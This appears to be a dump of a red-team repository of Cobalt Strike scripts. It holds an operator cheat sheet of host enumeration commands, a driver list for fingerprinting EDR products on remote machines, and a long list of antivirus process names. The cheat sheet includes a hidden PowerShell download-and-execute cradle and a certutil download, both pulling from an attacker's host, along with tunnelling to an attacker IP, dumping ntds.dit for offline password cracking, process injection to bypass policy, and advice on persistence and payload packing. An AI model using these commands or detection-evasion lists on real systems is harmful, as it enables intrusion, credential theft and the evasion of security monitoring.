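        AddDrivers(map, "Cisco Found!", "csacentr.sys", "csaenh.sys", "csareg.sys", "csascr.sys", "csaav.sys", "csaam.sys");
        AddDrivers(map, "Trend Micro Inc Found!", "tmums.sys", "hfileflt.sys", "tmumh.sys", "acdriver.sys", "sakfile.sys", "sakmfile.sys", "fileflt.sys", "tmesflt.sys", "tmevtmgr.sys", "tmfileencdmk.sys");
        AddDrivers(map, "Check Point Software Technologies Found!", "epregflt.sys", "medlpflt.sys", "dsfa.sys", "cposfw.sys");
        AddDrivers(map, "Absolute Found!", "psepfilter.sys", "cve.sys");
        AddDrivers(map, "Bromium Found!", "brfilter.sys", "brcow_x_x_x_x.sys");
        AddDrivers(map, "LogRhythm Found!", "lragentmf.sys");
        AddDrivers(map, "OPSWAT Inc Found!", "libwamf.sys");
        return map;
    }
}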
158 | }
159 |
--------------------------------------------------------------------------------
/RedTeamRepo.cna:
--------------------------------------------------------------------------------
1 | #RedTeamRepo
2 | #Author: @r3dqu1nn
3 | #A Common Repository for when you forget your RTFM and no googles.
4 | #https://www.sock-raw.org/wiki/doku.php/start - @ithilgore
5 | #http://pwnwiki.io/#!index.md
6 | #https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
7 | #This script will be continuously updated. Any input or feedback is welcomed!! Enjoy and happy hacking!
8 |
# Registers "RedRepo" with Beacon's help system so "help RedRepo" prints the syntax below;
# the command itself is the alias defined next. ("diplays" is a typo in the help string, left
# untouched here because it is runtime text.)
beacon_command_register("RedRepo", "A large repository of commands and red team tips",
    "\nSyntax: RedRepo [Option]\n" .
    "\nList Options: RedRepo [List]\n" .
    "\nDisplays well known commands for an OS, or diplays great tips or tricks for a Red Team Operator.\n");
13 |
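# Beacon console command "RedRepo <Option>": writes one of several reference sections into the
# Beacon log. $1 = beacon id, $2 = option. The sections are independent "if" blocks, each matched
# as a case-sensitive regex with ismatch, so "RedRepo list" (lower case) prints nothing.
#
# Fix relative to the original: the "Info Harvesting/Host/Network Enumeration" heading in the
# Linux section lacked its terminating semicolon, which Sleep's parser is expected to reject.
alias RedRepo {

    if ($2 ismatch 'List') {
        local('$out');
        $out = "RedRepo Options\n";
        $out .= " \c0===============\n\n";
        $out .= " Option Description\n";
        $out .= "\c0 ------ -----------\n";
        blog($1, $out);
        blog2($1, "\cBWindows Windows Enumeration Commands");
        blog2($1, "\cBLinux Linux Enumeration Commands");
        blog2($1, "\cBTips Red Team Tips");
        blog2($1, "\cBList List of Options");
        blog2($1, "\cBSmile Happy Hacking!\n");
    }

    if ($2 ismatch 'Windows') {

        blog($1, "\t\c4====== Common Windows Commands ======\n");

        #WMIC Commands
        blog($1, "\t\c4====== WMIC Enumeration Commands ======\n");

        blog2($1, "\t\cBwmic computersystem get Name,domain,NumberofProcessors,Roles,totalphysicalmemory");
        blog2($1, "\t\cBwmic desktop get Name,ScreenSaverActive,Wallpaper");
        blog2($1, "\t\cBwmic netlogin get Caption,Privileges,UserID,UserType,NumberOfLogons,PasswordAge,LogonServer,Workstations");
        blog2($1, "\t\cBwmic process get CSName,Description,ExecutablePath,ProcessId");
        blog2($1, "\t\cBwmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName");
        blog2($1, "\t\cBwmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace");
        blog2($1, "\t\cBwmic netuse list full");
        blog2($1, "\t\cBwmic startup get Caption,Command,Location,User");
        blog2($1, "\t\cBwmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version");
        blog2($1, "\t\cBwmic qfe get HotFixID,InstalledOn");
        blog2($1, "\t\cBwmic ntdomain list");
        blog2($1, "\t\cBwmic bios [list full]\n");

        blog($1, "\t\c4====== Info Harvesting ======\n");
        #Host Enumeration
        blog2($1, "\t\cBsysteminfo");
        blog2($1, "\t\cBsysteminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"");
        blog2($1, "\t\cBSET");
        blog2($1, "\t\cBipconfig /all");
        blog2($1, "\t\cBroute print");
        blog2($1, "\t\cBarp -a");
        blog2($1, "\t\cBnetstat -ano | findstr /I listening");
        blog2($1, "\t\cBnetstat -ano | findstr /I established");
        blog2($1, "\t\cBnbtstat -A *target IP*");
        blog2($1, "\t\cBnslookup");
        blog2($1, "\t\cBreg query [key]");
        blog2($1, "\t\cBGet-ItemProperty [key] (PowerShell)");
        blog2($1, "\t\cBschtasks /query /fo LIST /v");
        blog2($1, "\t\cBsc query");
        blog2($1, "\t\cBsc qc [service name]");
        blog2($1, "\t\cBtasklist /SVC (/S Remote Computer)");
        blog2($1, "\t\cBDRIVERQUERY");
        blog2($1, "\t\cBRun C:\\Windows\\System32\\gatherNetworkInfo.vbs script and check results inside C:\\Windows\\System32\\Config");
        blog2($1, "\t\cBgpresult /z");
        blog2($1, "\t\cBwhoami /all");
        blog2($1, "\t\cBnetsh firewall show conf");
        blog2($1, "\t\cBnetsh wlan show profiles");
        blog2($1, "\t\cBnetsh advfirewall show allprofiles\n");

        blog($1, "\t\c4======= Net Commands =======\n");
        #Old School Net Commands
        blog2($1, "\t\cBnet accounts [/domain]");
        blog2($1, "\t\cBnet group \"groupname\" [/domain]");
        blog2($1, "\t\cBnet localgroup \"groupname\" [/domain]");
        blog2($1, "\t\cBnet view [/domain]");
        blog2($1, "\t\cBnet session");
        blog2($1, "\t\cBnet share");
        blog2($1, "\t\cBnet user [/domain]");
        blog2($1, "\t\cBnet user [username] [/domain]");
        blog2($1, "\t\cBnet use * \\\\IP\\C$ /user:username [password]");
        blog2($1, "\t\cBUse the built in net commands with Beacon! [help net]\n");

    }

    if ($2 ismatch 'Linux') {

        blog($1, "\t\c4====== Common Linux Commands ======\n");

        # semicolon added here; the original line had none
        blog($1, "\t\c4====== Info Harvesting/Host/Network Enumeration ======\n");

        blog2($1, "\t\cBcat /etc/issue");
        blog2($1, "\t\cBcat /etc/*-release");
        blog2($1, "\t\cBcat /etc/*-release | grep -E '\"NAME=\"|ID|VERSION|ID_LIKE'");
        blog2($1, "\t\cBcat /proc/version");
        blog2($1, "\t\cBrpm -q kernel");
        blog2($1, "\t\cBdmesg | grep Linux");
        blog2($1, "\t\cBls /boot | grep vmlinuz-");
        blog2($1, "\t\cBlsb_release -a");
        blog2($1, "\t\cBlast -a");
        blog2($1, "\t\cBuname -a");
        blog2($1, "\t\cBuname -mrs");
        blog2($1, "\t\cBid");
        blog2($1, "\t\cBhistory");
        blog2($1, "\t\cBarp -a");
        blog2($1, "\t\cBnetstat -anot");
        blog2($1, "\t\cBps -elf");
        blog2($1, "\t\cBps -elf | grep root");
        blog2($1, "\t\cBls -la /var/www/html/");
        blog2($1, "\t\cBservice apache2 status");
        blog2($1, "\t\cBcat /etc/resolv.conf");
        blog2($1, "\t\cBcat /etc/networks");
        blog2($1, "\t\cBiptables -L");
        blog2($1, "\t\cBiptables -L -t nat");
        blog2($1, "\t\cBlsof -i");
        blog2($1, "\t\cBcat /etc/services");
        blog2($1, "\t\cBgrep 80 /etc/services");
        blog2($1, "\t\cBw");
        blog2($1, "\t\cBroute -n");
        blog2($1, "\t\cBcat /etc/passwd");
        blog2($1, "\t\cBcat /etc/passwd | awk -F : '{if (\$3 > 999 && \$3 < 60001) print \$1,\$3,\$6}'");
        blog2($1, "\t\cBcat /etc/motd");
        blog2($1, "\t\cBcat /etc/group");
        blog2($1, "\t\cBcat /etc/shadow\n");

    }

    if ($2 ismatch 'Tips') {

        blog($1, "\t\c4====== Red Team Tips ======\n");
        #Red Tips
        blog2($1, "\t\cBhttps://github.com/vysec/RedTips (If you have InterWebs)");
        blog2($1, "\t\cBhttps://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt (InterWebs Required)");
        blog2($1, "\t\cBNeed a map of the network? Run Bloodhound!! https://github.com/BloodHoundAD/BloodHound");
        blog2($1, "\t\cBAlways check sysvols!! Domain Controllers will have them, you'll be surprised how some are still viewable by normal users.");
        blog2($1, "\t\cBnet user a specific user and see if they are executing any logon scripts, those might contain juicy information.");
        blog2($1, "\t\cBAlways check Desktops/Documents/Downloads/Favorites folders for trails of valuable information left behind.");
        blog2($1, "\t\cBFind those Fileservers! Sysadmins leave behind all kinds of goodies there.");
        blog2($1, "\t\cBUse a Windows 7 workstation to tunnel your traffic natively. netsh int portproxy v4tov4 listenport=[port] connecthost=[AttackerIP] connectport=[port]");
        blog2($1, "\t\cBUse certutil.exe -urlcache -split -f [http://AttackerIP/RemoteFile] to download a file to the target machine.");
        blog2($1, "\t\cBThe all powerful one-liner powershell.exe -w hidden -nop -ep bypass -c \"IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))\"");
        blog2($1, "\t\cBUse tasklist /S [RemoteComputer] /SVC to see if you have access to that remote machine.");
        blog2($1, "\t\cBEnable RDP through the registry: reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f");
        blog2($1, "\t\cBPlease wrap/encode/pack your payloads if you have to drop to disk!");
        blog2($1, "\t\cBTry to stay in memory and avoid putting files on disk.");
        blog2($1, "\t\cBLive off the land!! Use what is on the target, native windows binaries are very powerful!");
        blog2($1, "\t\cBUse AD naming schemes to your advantage, sysadmins are lazy and use organization to help them with all the IT work they do on a daily basis.");
        blog2($1, "\t\cBEnterprise Admins will almost always have the rights to move laterally to those foreign domain controllers, 9 times out of 10 they use the same password!");
        blog2($1, "\t\cBInvoke-NinjaCopy.ps1 is super powerful and should be used to grab the ntds.dit and SYSTEM files for offline cracking.");
        blog2($1, "\t\cBHave multiple points of presence on a network for longer engagements. Persistence can go a long way for Security Operations.");
        blog2($1, "\t\cBcmd.exe and powershell.exe blocked by GPO? Find a process that's user owned and started on bootup for process injection to bypass that.");
        blog2($1, "\t\cBJust because you acquired initial access doesn't mean you stop doing recon. Network/Host Enumeration is always the most important part.");
        blog2($1, "\t\cBInvoke-ReverseDnsLookup.ps1 of powersploit finds those machines on the network that has DNS records and can provide more SA for an attacker.");
        blog2($1, "\t\cBNeed a Temporary web server? Use Python! python -m SimpleHTTPServer [port]\n");

    }

    if ($2 ismatch 'Smile') {
        local('$smile');
        $smile = "\n";
        $smile .= "\t\c9░░░░░░░░░░░███████░░░░░░░░░░░\n";
        $smile .= "\t\c9░░░░░░░████░░░░░░░████░░░░░░░\n";
        $smile .= "\t\c9░░░░░██░░░░░░░░░░░░░░░██░░░░░\n";
        $smile .= "\t\c9░░░██░░░░░░░░░░░░░░░░░░░██░░░\n";
        $smile .= "\t\c9░░█░░░░░░░░░░░░░░░░░░░░░░░█░░\n";
        $smile .= "\t\c9░█░░████░░░░░░░░██████░░░░░█░\n";
        $smile .= "\t\c9█░░█░░░██░░░░░░█░░░░███░░░░░█\n";
        $smile .= "\t\c9█░█░░░░░░█░░░░░█░░░░░░░█░░░░█\n";
        $smile .= "\t\c9█░█████████░░░░█████████░░░░█\n";
        $smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n";
        $smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n";
        $smile .= "\t\c9█░░░████████████████████░░░░█\n";
        $smile .= "\t\c9░█░░░█▓▓▓▓▓▓▓▓█████▓▓▓█░░░░█░\n";
        $smile .= "\t\c9░█░░░░█▓▓▓▓▓██░░░░██▓██░░░░█░\n";
        $smile .= "\t\c9░░█░░░░██▓▓█░░░░░░░▒██░░░░█░░\n";
        $smile .= "\t\c9░░░██░░░░██░░░░░░▒██░░░░██░░░\n";
        $smile .= "\t\c9░░░░░██░░░░███████░░░░██░░░░░\n";
        $smile .= "\t\c9░░░░░░░███░░░░░░░░░███░░░░░░░\n";
        $smile .= "\t\c9░░░░░░░░░░█████████░░░░░░░░░░\n";
        blog($1, $smile);
    }

    # no option given at all: point the operator at "List"
    if ($2 is $null) {
        berror($1, "\c4Need to specify additional syntax! Use the 'List' command for help");
        blog($1, "\cBSyntax Example: RedRepo Windows");
    }

}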
197 |
198 |
--------------------------------------------------------------------------------
/Logging/av_hips_executables.txt:
--------------------------------------------------------------------------------
1 | KeyPass.exe
2 | avgui.exe
3 | emet_agent.exe
4 | emet_service.exe
5 | firesvc.exe
6 | firetray.exe
7 | hipsvc.exe
8 | mfevtps.exe
9 | mcafeefire.exe
10 | scan32.exe
11 | shstat.exe
12 | tbmon.exe
13 | vstskmgr.exe
14 | engineserver.exe
15 | mfevtps.exe
16 | mfeann.exe
17 | mcscript.exe
18 | updaterui.exe
19 | udaterui.exe
20 | naprdmgr.exe
21 | frameworkservice.exe
22 | cleanup.exe
23 | cmdagent.exe
24 | frminst.exe
25 | mcscript_inuse.exe
26 | mctray.exe
27 | mcshield.exe
28 | AAWTray.exe
29 | Ad-Aware.exe
30 | MSASCui.exe
31 | _avp32.exe
32 | _avpcc.exe
33 | _avpm.exe
34 | aAvgApi.exe
35 | ackwin32.exe
36 | adaware.exe
37 | advxdwin.exe
38 | agentsvr.exe
39 | agentw.exe
40 | alertsvc.exe
41 | alevir.exe
42 | alogserv.exe
43 | amon9x.exe
44 | anti-trojan.exe
45 | antivirus.exe
46 | ants.exe
47 | apimonitor.exe
48 | aplica32.exe
49 | apvxdwin.exe
50 | arr.exe
51 | atcon.exe
52 | atguard.exe
53 | atro55en.exe
54 | atupdater.exe
55 | atwatch.exe
56 | au.exe
57 | aupdate.exe
58 | auto-protect.nav80try.exe
59 | autodown.exe
60 | autotrace.exe
61 | autoupdate.exe
62 | avconsol.exe
63 | ave32.exe
64 | avgcc32.exe
65 | avgctrl.exe
66 | avgemc.exe
67 | avgnt.exe
68 | avgrsx.exe
69 | avgserv.exe
70 | avgserv9.exe
71 | avguard.exe
72 | avgw.exe
73 | avkpop.exe
74 | avkserv.exe
75 | avkservice.exe
76 | avkwctl9.exe
77 | avltmain.exe
78 | avnt.exe
79 | avp.exe
80 | avp.exe
81 | avp32.exe
82 | avpcc.exe
83 | avpdos32.exe
84 | avpm.exe
85 | avptc32.exe
86 | avpupd.exe
87 | avsched32.exe
88 | avsynmgr.exe
89 | avwin.exe
90 | avwin95.exe
91 | avwinnt.exe
92 | avwupd.exe
93 | avwupd32.exe
94 | avwupsrv.exe
95 | avxmonitor9x.exe
96 | avxmonitornt.exe
97 | avxquar.exe
98 | backweb.exe
99 | bargains.exe
100 | bd_professional.exe
101 | beagle.exe
102 | belt.exe
103 | bidef.exe
104 | bidserver.exe
105 | bipcp.exe
106 | bipcpevalsetup.exe
107 | bisp.exe
108 | blackd.exe
109 | blackice.exe
110 | blink.exe
111 | blss.exe
112 | bootconf.exe
113 | bootwarn.exe
114 | borg2.exe
115 | bpc.exe
116 | brasil.exe
117 | bs120.exe
118 | bundle.exe
119 | bvt.exe
120 | ccapp.exe
121 | ccevtmgr.exe
122 | ccpxysvc.exe
123 | ccsvchst.exe
124 | ccSvcHst.exe
125 | cdp.exe
126 | cfd.exe
127 | cfgwiz.exe
128 | cfiadmin.exe
129 | cfiaudit.exe
130 | cfinet.exe
131 | cfinet32.exe
132 | claw95.exe
133 | claw95cf.exe
134 | clean.exe
135 | cleaner.exe
136 | cleaner3.exe
137 | cleanpc.exe
138 | click.exe
139 | cmesys.exe
140 | cmgrdian.exe
141 | cmon016.exe
142 | connectionmonitor.exe
143 | cpd.exe
144 | cpf9x206.exe
145 | cpfnt206.exe
146 | ctrl.exe
147 | cv.exe
148 | cwnb181.exe
149 | cwntdwmo.exe
150 | datemanager.exe
151 | dcomx.exe
152 | defalert.exe
153 | defscangui.exe
154 | defwatch.exe
155 | deputy.exe
156 | divx.exe
157 | dllcache.exe
158 | dllreg.exe
159 | doors.exe
160 | dpf.exe
161 | dpfsetup.exe
162 | dpps2.exe
163 | drwatson.exe
164 | drweb32.exe
165 | drwebupw.exe
166 | dssagent.exe
167 | dvp95.exe
168 | dvp95_0.exe
169 | ecengine.exe
170 | efpeadm.exe
171 | EMET_Agent.exe
172 | EMET_Service.exe
173 | emsw.exe
174 | ent.exe
175 | esafe.exe
176 | escanhnt.exe
177 | escanv95.exe
178 | espwatch.exe
179 | ethereal.exe
180 | etrustcipe.exe
181 | evpn.exe
182 | exantivirus-cnet.exe
183 | exe.avxw.exe
184 | expert.exe
185 | explore.exe
186 | f-agnt95.exe
187 | f-prot.exe
188 | f-prot95.exe
189 | f-stopw.exe
190 | fameh32.exe
191 | fast.exe
192 | fch32.exe
193 | fih32.exe
194 | findviru.exe
195 | firewall.exe
196 | fnrb32.exe
197 | fp-win.exe
198 | fp-win_trial.exe
199 | fprot.exe
200 | frw.exe
201 | fsaa.exe
202 | fsav.exe
203 | fsav32.exe
204 | fsav530stbyb.exe
205 | fsav530wtbyb.exe
206 | fsav95.exe
207 | fsgk32.exe
208 | fsm32.exe
209 | fsma32.exe
210 | fsmb32.exe
211 | gator.exe
212 | gbmenu.exe
213 | gbpoll.exe
214 | generics.exe
215 | gmt.exe
216 | guard.exe
217 | guarddog.exe
218 | hacktracersetup.exe
219 | hbinst.exe
220 | hbsrv.exe
221 | hotactio.exe
222 | hotpatch.exe
223 | htlog.exe
224 | htpatch.exe
225 | hwpe.exe
226 | hxdl.exe
227 | hxiul.exe
228 | iamapp.exe
229 | iamserv.exe
230 | iamstats.exe
231 | ibmasn.exe
232 | ibmavsp.exe
233 | icload95.exe
234 | icloadnt.exe
235 | icmon.exe
236 | icsupp95.exe
237 | icsuppnt.exe
238 | idle.exe
239 | iedll.exe
240 | iedriver.exe
241 | iface.exe
242 | ifw2000.exe
243 | inetlnfo.exe
244 | infus.exe
245 | infwin.exe
246 | init.exe
247 | intdel.exe
248 | intren.exe
249 | iomon98.exe
250 | istsvc.exe
251 | jammer.exe
252 | jdbgmrg.exe
253 | jedi.exe
254 | kavlite40eng.exe
255 | kavpers40eng.exe
256 | kavpf.exe
257 | kazza.exe
258 | keenvalue.exe
259 | kerio-pf-213-en-win.exe
260 | kerio-wrl-421-en-win.exe
261 | kerio-wrp-421-en-win.exe
262 | kernel32.exe
263 | killprocesssetup161.exe
264 | launcher.exe
265 | ldnetmon.exe
266 | ldpro.exe
267 | ldpromenu.exe
268 | ldscan.exe
269 | lnetinfo.exe
270 | loader.exe
271 | localnet.exe
272 | LockAppHost.exe
273 | LockApp.exe
274 | lockdown.exe
275 | lockdown2000.exe
276 | lookout.exe
277 | lordpe.exe
278 | lsetup.exe
279 | luall.exe
280 | luau.exe
281 | lucomserver.exe
282 | luinit.exe
283 | luspt.exe
284 | mapisvc32.exe
285 | mcagent.exe
286 | mcmnhdlr.exe
287 | mcshield.exe
288 | mctool.exe
289 | mcupdate.exe
290 | mcvsrte.exe
291 | mcvsshld.exe
292 | md.exe
293 | mfin32.exe
294 | mfw2en.exe
295 | mfweng3.02d30.exe
296 | mgavrtcl.exe
297 | mgavrte.exe
298 | mghtml.exe
299 | mgui.exe
300 | minilog.exe
301 | mmod.exe
302 | monitor.exe
303 | moolive.exe
304 | mostat.exe
305 | mpfagent.exe
306 | mpfservice.exe
307 | mpftray.exe
308 | mrflux.exe
309 | msapp.exe
310 | msbb.exe
311 | msblast.exe
312 | mscache.exe
313 | msccn32.exe
314 | mscman.exe
315 | msconfig.exe
316 | msdm.exe
317 | msdos.exe
318 | msiexec16.exe
319 | msinfo32.exe
320 | mslaugh.exe
321 | msmgt.exe
322 | msmsgri32.exe
323 | mssmmc32.exe
324 | mssys.exe
325 | msvxd.exe
326 | mu0311ad.exe
327 | mwatch.exe
328 | n32scanw.exe
329 | nav.exe
330 | navap.navapsvc.exe
331 | navapsvc.exe
332 | navapw32.exe
333 | navdx.exe
334 | navlu32.exe
335 | navnt.exe
336 | navstub.exe
337 | navw32.exe
338 | navwnt.exe
339 | nc2000.exe
340 | ncinst4.exe
341 | ndd32.exe
342 | neomonitor.exe
343 | neowatchlog.exe
344 | netarmor.exe
345 | netd32.exe
346 | netinfo.exe
347 | netmon.exe
348 | netscanpro.exe
349 | netspyhunter-1.2.exe
350 | netstat.exe
351 | netutils.exe
352 | nisserv.exe
353 | nisum.exe
354 | nmain.exe
355 | nod32.exe
356 | normist.exe
357 | norton_internet_secu_3.0_407.exe
358 | notstart.exe
359 | npf40_tw_98_nt_me_2k.exe
360 | npfmessenger.exe
361 | nprotect.exe
362 | npscheck.exe
363 | npssvc.exe
364 | nsched32.exe
365 | nssys32.exe
366 | nstask32.exe
367 | nsupdate.exe
368 | nt.exe
369 | ntrtscan.exe
370 | ntvdm.exe
371 | ntxconfig.exe
372 | nui.exe
373 | nupgrade.exe
374 | nvarch16.exe
375 | nvc95.exe
376 | nvsvc32.exe
377 | nwinst4.exe
378 | nwservice.exe
379 | nwtool16.exe
380 | ollydbg.exe
381 | onsrvr.exe
382 | optimize.exe
383 | ostronet.exe
384 | otfix.exe
385 | outpost.exe
386 | outpostinstall.exe
387 | outpostproinstall.exe
388 | padmin.exe
389 | panixk.exe
390 | patch.exe
391 | pavcl.exe
392 | pavproxy.exe
393 | pavsched.exe
394 | pavw.exe
395 | pccwin98.exe
396 | pcfwallicon.exe
397 | pcip10117_0.exe
398 | pcscan.exe
399 | pdsetup.exe
400 | periscope.exe
401 | persfw.exe
402 | perswf.exe
403 | pf2.exe
404 | pfwadmin.exe
405 | pgmonitr.exe
406 | pingscan.exe
407 | platin.exe
408 | pop3trap.exe
409 | poproxy.exe
410 | popscan.exe
411 | portdetective.exe
412 | portmonitor.exe
413 | powerscan.exe
414 | ppinupdt.exe
415 | pptbc.exe
416 | ppvstop.exe
417 | prizesurfer.exe
418 | prmt.exe
419 | prmvr.exe
420 | procdump.exe
421 | processmonitor.exe
422 | procexplorerv1.0.exe
423 | programauditor.exe
424 | proport.exe
425 | protectx.exe
426 | pspf.exe
427 | purge.exe
428 | qconsole.exe
429 | qserver.exe
430 | rapapp.exe
431 | rav7.exe
432 | rav7win.exe
433 | rav8win32eng.exe
434 | ray.exe
435 | rb32.exe
436 | rcsync.exe
437 | realmon.exe
438 | reged.exe
439 | regedit.exe
440 | regedt32.exe
441 | rescue.exe
442 | rescue32.exe
443 | rrguard.exe
444 | rshell.exe
445 | rtvscan.exe
446 | rtvscn95.exe
447 | rulaunch.exe
448 | run32dll.exe
449 | rundll.exe
450 | rundll16.exe
451 | ruxdll32.exe
452 | safeweb.exe
453 | sahagent.exescan32.exe
454 | shstat.exe
455 | tbmon.exe
456 | vstskmgr.exe
457 | engineserver.exe
458 | mfevtps.exe
459 | mfeann.exe
460 | mcscript.exe
461 | updaterui.exe
462 | udaterui.exe
463 | naprdmgr.exe
464 | frameworkservice.exe
465 | cleanup.exe
466 | cmdagent.exe
467 | frminst.exe
468 | mcscript_inuse.exe
469 | mctray.exe
470 | mcshield.exe
471 | save.exe
472 | savenow.exe
473 | sbserv.exe
474 | sc.exe
475 | scam32.exe
476 | scan32.exe
477 | scan95.exe
478 | scanpm.exe
479 | scrscan.exe
480 | serv95.exe
481 | setup_flowprotector_us.exe
482 | setupvameeval.exe
483 | sfc.exe
484 | sgssfw32.exe
485 | sh.exe
486 | shellspyinstall.exe
487 | shn.exe
488 | showbehind.exe
489 | smc.exe
490 | Smc.exe
491 | SmcGui.exe
492 | sms.exe
493 | smss32.exe
494 | SymCorpUI.exe
495 | soap.exe
496 | sofi.exe
497 | sperm.exe
498 | spf.exe
499 | sphinx.exe
500 | spoler.exe
501 | spoolcv.exe
502 | spoolsv32.exe
503 | spyxx.exe
504 | srexe.exe
505 | srng.exe
506 | ss3edit.exe
507 | ssg_4104.exe
508 | ssgrate.exe
509 | st2.exe
510 | start.exe
511 | stcloader.exe
512 | supftrl.exe
513 | support.exe
514 | supporter5.exe
515 | svchostc.exe
516 | svchosts.exe
517 | sweep95.exe
518 | sweepnet.sweepsrv.sys.swnetsup.exe
519 | symproxysvc.exe
520 | symtray.exe
521 | sysedit.exe
522 | sysupd.exe
523 | taskmg.exe
524 | taskmo.exe
525 | taumon.exe
526 | tbscan.exe
527 | tc.exe
528 | tca.exe
529 | tcm.exe
530 | tds-3.exe
531 | tds2-98.exe
532 | tds2-nt.exe
533 | teekids.exe
534 | tfak.exe
535 | tfak5.exe
536 | tgbob.exe
537 | titanin.exe
538 | titaninxp.exe
539 | tracert.exe
540 | trickler.exe
541 | trjscan.exe
542 | trjsetup.exe
543 | trojantrap3.exe
544 | tsadbot.exe
545 | tvmd.exe
546 | tvtmd.exe
547 | undoboot.exe
548 | updat.exe
549 | update.exe
550 | upgrad.exe
551 | utpost.exe
552 | vbcmserv.exe
553 | vbcons.exe
554 | vbust.exe
555 | vbwin9x.exe
556 | vbwinntw.exe
557 | vcsetup.exe
558 | vet32.exe
559 | vet95.exe
560 | vettray.exe
561 | vfsetup.exe
562 | vir-help.exe
563 | virusmdpersonalfirewall.exe
564 | vnlan300.exe
565 | vnpc3000.exe
566 | vpc32.exe
567 | vpc42.exe
568 | vpfw30s.exe
569 | vptray.exe
570 | vscan40.exe
571 | vscenu6.02d30.exe
572 | vsched.exe
573 | vsecomr.exe
574 | vshwin32.exe
575 | vsisetup.exe
576 | vsmain.exe
577 | vsmon.exe
578 | vsstat.exe
579 | vswin9xe.exe
580 | vswinntse.exe
581 | vswinperse.exe
582 | w32dsm89.exe
583 | w9x.exe
584 | watchdog.exe
585 | webdav.exe
586 | webscanx.exe
587 | webtrap.exe
588 | wfindv32.exe
589 | whoswatchingme.exe
590 | wimmun32.exe
591 | win-bugsfix.exe
592 | win32.exe
593 | win32us.exe
594 | winactive.exe
595 | window.exe
596 | windows.exe
597 | wininetd.exe
598 | wininitx.exe
599 | winlogin.exe
600 | winmain.exe
601 | winnet.exe
602 | winppr32.exe
603 | winrecon.exe
604 | winservn.exe
605 | winssk32.exe
606 | winstart.exe
607 | winstart001.exe
608 | wintsk32.exe
609 | winupdate.exe
610 | wkufind.exe
611 | wnad.exe
612 | wnt.exe
613 | wradmin.exe
614 | wrctrl.exe
615 | wsbgate.exe
616 | wupdater.exe
617 | wupdt.exe
618 | wyvernworksfirewall.exe
619 | xpf202en.exe
620 | zapro.exe
621 | zapsetup3001.exe
622 | zatutor.exe
623 | zonalm2601.exe
624 | zonealarm.exe
625 |
--------------------------------------------------------------------------------
/EDR.cna:
--------------------------------------------------------------------------------
1 | ## EDR.cna
2 | ## Author: @r3dqu1nn
3 | ## Remotely query a system for EDR products
4 | ## Additions made by @_bin_Ash
5 |
6 | ## List of EDR drivers
## Driver file names that &list checks every entry of the remote
## drivers-directory listing against (`$name in @edr`). The membership test
## is an exact string comparison and is presumably case-sensitive, so the
## spelling here has to match what the directory listing returns — verify.
## Defender note: a listing of system32\drivers is the reconnaissance step
## that precedes tooling choices; this array is the reference of which
## driver names that reconnaissance is looking for.
7 | @edr = @("psepfilter.sys", "cbfsfilter2017.sys", "cve.sys", "atrsdfw.sys", "naswSP.sys", "aswSP.sys", "avgtpx86.sys", "avgtpx64.sys", "edrsensor.sys", "hbflt.sys", "bdsvm.sys", "gzflt.sys", "bddevflt.sys", "AVCKF.SYS", "Atc.sys", "AVC3.SYS", "TRUFOS.SYS", "BDSandBox.sys", "brfilter.sys", "BrCow_x_x_x_x.sys", "bemk.sys", "CarbonBlackK.sys", "parity.sys", "cbstream.sys", "cbk7.sys", "ctifile.sys", "epregflt.sys", "medlpflt.sys", "dsfa.sys", "cposfw.sys", "CiscoAMPCEFWDriver.sys", "CiscoAMPHeurDriver.sys", "cb", "csaenh.sys", "csareg.sys", "csascr.sys", "csaav.sys", "csaam.sys", "csacentr.sys", "rvsavd.sys", "cfrmd.sys", "cmdccav.sys", "cmdguard.sys", "CmdMnEfs.sys", "MyDLPMF.sys", "im.sys", "CSDeviceControl.sys", "csagent.sys", "CSBoot.sys", "cspcm2.sys", "CybKernelTracker.sys", "CRExecPrev.sys", "CyOptics.sys", "CyProtectDrv32.sys", "CyProtectDrv64.sys.sys", "CyProtectDrv64.sys", "groundling32.sys", "groundling64.sys", "ElasticEndpoint.sys", "ElasticEndpointDriver.sys", "esensor.sys", "edevmon.sys", "ehdrv.sys", "FeKern.sys", "WFP_MRT.sys", "xfsgk.sys", "fsatp.sys", "fshs.sys", "fsgk.sys", "HexisFSMonitor.sys", "klifks.sys", "klifaa.sys", "Klifsm.sys", "LRAgentMF.sys", "mbamwatchdog.sys", "mfeaskm.sys", "mfencfilter.sys", "epdrv.sys", "mfencoas.sys", "mfehidk.sys", "swin.sys", "hdlpflt.sys", "mfprom.sys", "MfeEEFF.sys", "libwamf.sys", "telam.sys", "PSINPROC.SYS", "PSINFILE.SYS", "amfsm.sys", "amm8660.sys", "amm6460.sys", "eaw.sys", "SAFE-Agent.sys", "SentinelMonitor.sys", "SAVOnAccess.sys", "sld.sys", "SophosED.sys", "sntp.sys", "swi_callout.sys", "hmpalert.sys", "sdcfilter.sys", "SophosBootDriver.sys", "pgpwdefs.sys", "GEProtection.sys", "diflt.sys", "sysMon.sys", "ssrfsf.sys", "emxdrv2.sys", "reghook.sys", "spbbcdrv.sys", "bhdrvx86.sys", "bhdrvx64.sys", "SISIPSFileFilter", "symevent.sys", "vxfsrep.sys", "VirtFile.sys", "SymAFR.sys", "symefasi.sys", "symefa.sys", "symefa64.sys", "SymHsm.sys", "evmf.sys", "GEFCMP.sys", "VFSEnc.sys", "pgpfs.sys", "fencry.sys", 
"symrg.sys", "SISIPSFileFilter.sys", "TMUMS.sys", "hfileflt.sys", "TMUMH.sys", "AcDriver.sys", "SakFile.sys", "SakMFile.sys", "fileflt.sys", "TmEsFlt.sys", "tmevtmgr.sys", "TmFileEncDmk.sys", "ndgdmk.sys", "dgdmk.sys", "ssfmonm.sys");
8 |
9 |
10 | ## edr_query Command Register
## Registers the help text shown for the `edr_query` console command; the
## handler itself is the `alias edr_query` block below. Arguments are
